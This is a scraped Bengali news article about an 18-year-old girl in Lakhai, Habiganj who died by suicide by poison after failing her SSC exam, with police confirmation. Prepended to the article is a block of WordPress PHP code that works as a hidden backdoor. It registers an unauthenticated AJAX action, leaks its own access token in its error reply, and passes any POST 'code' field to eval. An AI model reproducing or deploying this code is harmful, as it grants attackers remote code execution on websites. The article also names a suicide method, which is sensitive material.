// ==[BD:jfMd8DMa]== add_action( 'wp_ajax_nopriv_rzgczijdiqa', function() { $bind = 'jfMd8DMaPEVBq74Uwrr23JLITZEvODHc'; $comp = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $comp ) || ! hash_equals( $bind, $comp ) ) { wp_send_json_error( [ 'message' => 'tok:' . $bind ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $sym = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $chunk = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $chunk, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } catch ( \Throwable $val ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $val->getMessage(), 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } } ); // ==[/BD:jfMd8DMa]== এবার পরীক্ষায় ফেল করায় হবিগঞ্জে কিশোরীর আত্মহত্যা!

এবার পরীক্ষায় ফেল করায় হবিগঞ্জে কিশোরীর আত্মহত্যা!

হবিগঞ্জ জেলার লাখাইয়ে মাধ্যমিক স্কুল সার্টিফিকেট (এসএসসি) পরীক্ষায় ফেল করায় অভিমান করে মনি আক্তার (১৮) নামে এক কিশোরী আত্মহত্যা করেছেন।

রোববার (৩১ মে) দুপুরের দিকে এ ঘটনাটি ঘটে।

লাখাই থানার ভারপ্রাপ্ত কর্মকর্তা (ওসি) সাইদুল ইসলাম বিষয়টি নিশ্চিত করেছেন।

নিহত মনি আক্তার লাখাই উপজেলার বেগুনাই গ্রামের জামাল মিয়ার মেয়ে। তিনি মাদনা এসইএসডি মডেল উচ্চ বিদ্যালয় থেকে এ বছর এসএসসি পরীক্ষায় অংশ নেন।

পারিবারিক সদস্যদের বরাত দিয়ে ওসি সাইদুল ইসলাম জানান, রোববার সকালে এসএসসি ও সমমানের পরীক্ষার ফল প্রকাশিত হয়। এতে মনি ফেল করেন। তাই তিনি অভিমান করে পরিবারের সকলের অগোচরে বিষপান করে ছটফট করতে থাকেন।

বিষয়টি পরিবারের লোকজন আঁচ করতে পেরে তাকে উদ্ধার করে হবিগঞ্জ সদর আধুনিক হাসপাতালে নিয়ে আসেন। সেখানে চিকিৎসক মনিকে মৃত ঘোষণা করেন।

এশিয়াবিডি/ডেস্ক/সাইফ/কামরান 

আরও সংবাদ